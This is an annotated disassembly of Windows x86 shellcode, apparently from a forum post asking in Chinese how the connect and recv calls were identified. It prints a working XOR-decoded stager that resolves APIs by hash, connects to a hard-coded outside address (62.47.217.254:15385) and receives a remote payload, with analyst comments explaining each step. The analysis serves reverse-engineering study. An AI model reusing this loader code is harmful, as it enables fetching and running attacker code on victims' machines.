; ---- Stage 0: XOR decoder stub (x86-32). The jmp/call/pop trio fetches the
; runtime address of the encoded body, so the stub runs at any load address.
; It writes to the very bytes it then jumps into, i.e. it needs memory that is
; both writable and executable (W^X enforcement / RWX-region monitoring catches
; exactly this pattern).
00402018 eb 15 jmp short link-03.0040202f          ; hop to the call below
0040201a b9 8be61341 mov ecx,4113e68b              ; ecx = 0x4113e68b ^ 0x4113e639 = 0xB2 (178) = bytes to decode;
0040201f 81f1 39e61341 xor ecx,4113e639            ;   the count is split over two immediates (presumably to keep NUL bytes out of the encoding)
00402025 5e pop esi                                ; esi = return address pushed by the call = 0x00402034, start of the encoded body
00402026 807431 ff 17 xor byte ptr ds:[ecx+esi-1],17 ; decode one byte with key 0x17, walking from the end of the body back to esi
0040202b ^e2 f9 loopd short link-03.00402026       ; ecx--; repeat while ecx != 0 (covers [esi, esi+0xB1])
0040202d eb 05 jmp short link-03.00402034          ; enter the decoded body (the listing below appears in its decoded form)
0040202f e8 e6ffffff call link-03.0040201a         ; pushes 0x00402034 as the "return address"; control never comes back here
; ---- Stage 1: find a module base through the PEB loader lists (fs:[0x30] is
; the TEB->PEB pointer on x86-32), so the resolver below can walk that module's
; export table without needing an import table.
00402034 33db xor ebx,ebx                          ; ebx = 0; kept as a zero constant for the rest of the payload
00402036 64:8b43 30 mov eax,dword ptr fs:[ebx+30]  ; eax = PEB
0040203a 8b40 0c mov eax,dword ptr ds:[eax+c]      ; eax = PEB->Ldr (PEB + 0xC)
0040203d 8b70 1c mov esi,dword ptr ds:[eax+1c]     ; esi = Ldr->InInitializationOrderModuleList.Flink (Ldr + 0x1C)
00402040 ad lods dword ptr ds:[esi]                ; eax = [esi] = the first entry's Flink, i.e. the SECOND module in init order; esi += 4 (unused)
00402041 8b78 08 mov edi,dword ptr ds:[eax+8]      ; edi = entry->DllBase (+8 from the InInitializationOrder links)
                                                   ; NOTE(review): this only works if that second entry is kernel32.dll, which
                                                   ; holds on older Windows versions; the list order differs on newer ones — confirm in a debugger
00402044 e8 45000000 call link-03.0040208e         ; pushes 0x00402049 (the resolver's entry address) and lands at 0x0040208e
;-----------------------------------------------------------------------
; API-by-hash resolver, entered with `call esi` (esi = 0x00402049)
; In:    edi = base of the in-memory PE module to search
;        edx = 32-bit hash of the wanted export name
; Out:   tail-jumps to the export with the caller's stack intact, so the
;        API returns directly to the `call esi` site; eax = export VA
; Saves: ebx, esi (push/pop)     Clobbers: eax, ecx, flags
; Hash:  h = 0; for every byte b of the name INCLUDING the terminating NUL:
;        cl ^= b; h = rol32(h, 5). A name matches when h == edx.
; Analyst note: this is how the `; connect()` / `; recv()` labels on the
; page are obtained — run the hash above over each export name of the
; module in edi and find the one equal to the edx constant at the call site.
; There is no NumberOfNames bound: an unmatched hash keeps reading past
; the end of the name-pointer table.
;-----------------------------------------------------------------------
00402049 53 push ebx ; ------ syscall finder  (API-by-hash resolver; save caller's ebx)
0040204a 56 push esi                               ; save caller's esi (the resolver address itself)
0040204b 8b5f 3c mov ebx,dword ptr ds:[edi+3c]     ; ebx = e_lfanew (offset of the PE header)
0040204e 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78] ; ebx = DataDirectory[0].VirtualAddress = export directory RVA (PE header + 0x78)
00402052 03df add ebx,edi                          ; -> VA of IMAGE_EXPORT_DIRECTORY
00402054 53 push ebx                               ; [esp] = export directory (popped into esi at 0x00402077)
00402055 8b5b 20 mov ebx,dword ptr ds:[ebx+20]     ; AddressOfNames RVA (export dir + 0x20)
00402058 03df add ebx,edi                          ; -> VA of the name-pointer table
0040205a 53 push ebx                               ; [esp] = table start (popped into eax at 0x00402072)
0040205b 83c3 04 add ebx,4                         ; advance to the next name pointer; the increment comes first, so names[0] is never compared
0040205e 8b33 mov esi,dword ptr ds:[ebx]           ; esi = RVA of this export name
00402060 03f7 add esi,edi                          ; -> VA of the ASCIIZ name
00402062 33c9 xor ecx,ecx                          ; h = 0
00402064 ac lods byte ptr ds:[esi]                 ; al = *esi++
00402065 32c8 xor cl,al                            ; fold the byte into the low 8 bits of h
00402067 c1c1 05 rol ecx,5                         ; h = rol32(h, 5)
0040206a 84c0 test al,al                           ; the NUL terminator is folded in too before the loop exits
0040206c ^75 f6 jnz short link-03.00402064
0040206e 2bca sub ecx,edx                          ; ecx = h - wanted; 0 on a match
00402070 ^75 e9 jnz short link-03.0040205b         ; no match -> try the next name
00402072 58 pop eax                                ; eax = start of the name-pointer table
00402073 2bd8 sub ebx,eax                          ; ebx = 4 * index of the matching name
00402075 d1eb shr ebx,1                            ; ebx = 2 * index (ordinal table entries are WORDs)
00402077 5e pop esi                                ; esi = export directory
00402078 035e 24 add ebx,dword ptr ds:[esi+24]     ; + AddressOfNameOrdinals RVA (export dir + 0x24)
0040207b 03df add ebx,edi                          ; -> &ordinals[index]
0040207d 66:8b0b mov cx,word ptr ds:[ebx]          ; cx = ordinal; ecx is already 0 here (the loop exited with ecx == 0), so this yields a clean zero-extended index
00402080 8b5e 1c mov ebx,dword ptr ds:[esi+1c]     ; AddressOfFunctions RVA (export dir + 0x1C)
00402083 03df add ebx,edi                          ; -> VA of the function-address table
00402085 8b048b mov eax,dword ptr ds:[ebx+ecx*4]   ; RVA of the export
00402088 03c7 add eax,edi                          ; -> VA of the export
0040208a 5e pop esi                                ; restore caller's esi
0040208b 5b pop ebx                                ; restore caller's ebx
0040208c ffe0 jmp eax                              ; tail jump: the API sees the caller's pushed arguments and return address
; ---- Stage 2: payload body. Each `call esi` below enters the resolver at
; 0x00402049 with edx = name hash and edi = module base, and the resolved API
; returns straight back here. Arguments are pushed right-to-left (stdcall).
0040208e 5e pop esi ; ------- end  (of the resolver)  esi = 0x00402049, the return address pushed by the call at 0x00402044
0040208f 68 33320000 push 3233                     ; bytes "32\0\0"
00402094 68 7773325f push 5f327377                 ; bytes "ws2_"  -> the stack now holds the string "ws2_32"
00402099 54 push esp                               ; arg: lpLibFileName = pointer to that string
0040209a ba 926e0484 mov edx,84046e92              ; hash constant the page labels as LoadLibraryA
0040209f ffd6 call esi ; loadlibrarya()            ; eax = HMODULE of ws2_32.dll (the module in edi must export LoadLibraryA)
004020a1 8bf8 mov edi,eax                          ; edi = ws2_32 base: from here on the resolver searches Winsock's exports
004020a3 81ec 00020000 sub esp,200                 ; reserve 0x200 (512) bytes of stack
004020a9 8bec mov ebp,esp                          ; ebp = that buffer (used as the recv buffer below)
004020ab 53 push ebx                               ; protocol = 0 (ebx has held 0 since 0x00402034; callee-saved across the API calls)
004020ac 6a 01 push 1                              ; type = 1 (SOCK_STREAM)
004020ae 6a 02 push 2                              ; af = 2 (AF_INET)
004020b0 ba 83538300 mov edx,835383                ; hash constant the page labels as socket
004020b5 ffd6 call esi ; socket()                  ; eax = socket handle. No WSAStartup call is visible in this listing — presumably relies on the host process having initialised Winsock
004020b7 53 push ebx                               ; sockaddr_in.sin_zero (8 zero bytes)
004020b8 53 push ebx
004020b9 68 3e2fd9fe push fed92f3e                 ; sin_addr, in-memory bytes 3e 2f d9 fe -> 62.47.217.254 (an indicator worth extracting for detection)
004020be 68 02003c19 push 193c0002                 ; sin_family = 2 (AF_INET); sin_port bytes 3c 19 in network order -> port 15385 (0x3C19)
004020c3 8bd4 mov edx,esp                          ; edx = &sockaddr_in
004020c5 8bd8 mov ebx,eax                          ; ebx = socket handle (eax has not been written since socket() returned)
004020c7 6a 10 push 10                             ; namelen = 0x10 = sizeof(sockaddr_in)
004020c9 52 push edx                               ; name
004020ca 53 push ebx                               ; s
004020cb ba 6330605a mov edx,5a603063              ; hash constant the page labels as connect
004020d0 ffd6 call esi ; connect()                 ; eax = 0 on success, SOCKET_ERROR (-1) on failure
004020d2 50 push eax                               ; flags = eax — correct (0) only if connect() succeeded; the return value is never checked
004020d3 b4 02 mov ah,2                            ; eax = 0x200, again assuming eax was 0
004020d5 50 push eax                               ; len = 0x200, the size of the stack buffer
004020d6 55 push ebp                               ; buf = the stack buffer
004020d7 53 push ebx                               ; s
004020d8 ba 005860e2 mov edx,e2605800              ; hash constant the page labels as recv
004020dd ffd6 call esi ; recv()                    ; reads up to 0x200 bytes from the remote peer into the stack buffer
004020df bf acac0685 mov edi,8506acac              ; edi (the resolver's module base) is overwritten with a new constant; what follows is outside this listing
这是一段shellcode
请教
004020d0 ffd6 call esi ; connect()
这里是通过什么判断出使用了 connect 函数的？是怎么分析出来的？
同样
004020dd ffd6 call esi ; recv()?